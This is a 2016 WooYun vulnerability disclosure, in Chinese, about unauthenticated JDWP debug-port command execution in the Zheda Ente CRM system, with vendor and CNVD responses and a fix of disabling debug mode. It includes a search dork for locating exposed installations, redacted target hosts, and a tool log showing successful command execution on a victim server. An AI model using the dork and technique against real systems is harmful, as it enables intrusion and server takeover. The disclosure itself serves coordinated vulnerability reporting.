当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199802

漏洞标题:浙大恩特某资源管理系统通用JDWP命令执行(无需登录)

相关厂商:杭州浙大恩特网络科技有限公司

漏洞作者: Aasron

提交时间:2016-04-27 20:30

修复时间:2016-06-13 10:20

公开时间:2016-06-13 10:20

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-29: 厂商已经确认,细节仅向厂商公开
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

浙大恩特网络科技有限公司成立于2002年2月份,隶属于浙江大学国家大学科技园,是浙江省高新技术产业重点企业,公司立足于为中国外向型企业提供管理软件系统的设计以及研发和咨询服务。
经过八年多的发展,公司已经拥有了“客户资源管理系统”、“外贸出口业务管理系统”、“外贸进销存管理系统”、“网络监控管理系统”、“网络传真管理系统” 等一系列专门面向外向型企业的管理软件。 其中“浙大恩特客户资源管理系统” 经多年市场检验,已经成为国内技术领先 、功能最强 、口碑最佳的外贸客户管理软件,为广大的进出口公司、自营出口的生产企业解决了客户资源及邮件传真等联系管理的难题, 增加出口订单,并大大提高了工作效率,得到了广泛的好评。

详细说明:

附大量案例
在百度构建关键字即可:
intitle:欢迎使用浙大恩特客户资源管理系统

1.png


开启端口根据每台服务端情况不同

1.png


**.**.**.**:81/
http://**.**.**.**/
http://**.**.**.**/
**.**.**.**/
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**

漏洞证明:

1.png


1.png


[+] Targeting '**.**.**.**:8787'
[+] Reading settings for 'Java HotSpot(TM) Server VM - 1.7.0_40'
[+] Found Runtime class: id=2405
[+] Found Runtime.getRuntime(): id=3dc1b124
[+] Created break event id=2
[+] Waiting for an event on '**.**.**.**.ServerSocket.accept'
[+] Received matching event from thread 0x34eb
[+] Found Java Virtual Machine specification vendor 'Oracle Corporation'
[+] Found Java Runtime Environment specification name 'Java Platform API Specifi
cation'
[+] Found Path of extension directory or directories 'D:\EnterCRM\jdk1.7.0_40\jr
e\lib\ext;C:\Windows\Sun\Java\lib\ext'
[+] Found Java Runtime Environment specification vendor 'Oracle Corporation'
[+] Found Java Virtual Machine specification version '1.7'
[+] Found Operating system name 'Windows Server 2008 R2'
[+] Found Default temp file path 'C:\Windows\TEMP\'
[+] Found User's current working directory 'D:\EnterCRM\bin'
[+] Found Java installation directory 'D:\EnterCRM\jdk1.7.0_40\jre'
[+] Found User's account name 'QZ-DUNTUO$'
[+] Found Java Virtual Machine implementation vendor 'Oracle Corporation'
[+] Found Java Runtime Environment vendor 'Oracle Corporation'
[+] Found Path separator ';'
[+] Found Java vendor URL 'http://**.**.**.**/'
[+] Found Java class path 'D:\EnterCRM\bin\run.jar'
[+] Found Java Runtime Environment specification version '1.7'
[+] Found Operating system version '6.1'
[+] Found Operating system architecture 'x86'
[+] Found Java Runtime Environment version '1.7.0_40'
[+] Found Java Virtual Machine implementation version '24.0-b56'
[+] Found Java Virtual Machine specification name 'Java Virtual Machine Specific
ation'
[+] Found File separator '\'
[-] **.**.**.**piler: Unexpected returned type: expecting String
[+] Found Java class format version number '51.0'
[+] Found List of paths to search when loading libraries 'D:\EnterCRM\jdk1.7.0_4
0\bin;C:\Windows\Sun\Java\bin;C:\Windows\system32;C:\Windows;D:\EnterCRM\jdk1.7.
0_40\bin;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\Syst
em32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Sybase\SQL Anywhere 9\win32;
C:\Program Files (x86)\Sybase\Shared\win32;C:\Program Files (x86)\Sybase\SQL Any
where 9\drivers;C:\Program Files (x86)\Sybase\Shared\Sybase Central 4.3\win32;;.
'
[+] Found Java Virtual Machine implementation name 'Java HotSpot(TM) Server VM'
[+] Found User's home directory 'C:\'
[!] Command successfully executed


要是windows系统的话,默认开启3389端口,直接执行命令即可,可直接获取服务器权限

修复方案:

关闭调试模式

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-04-29 10:16

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无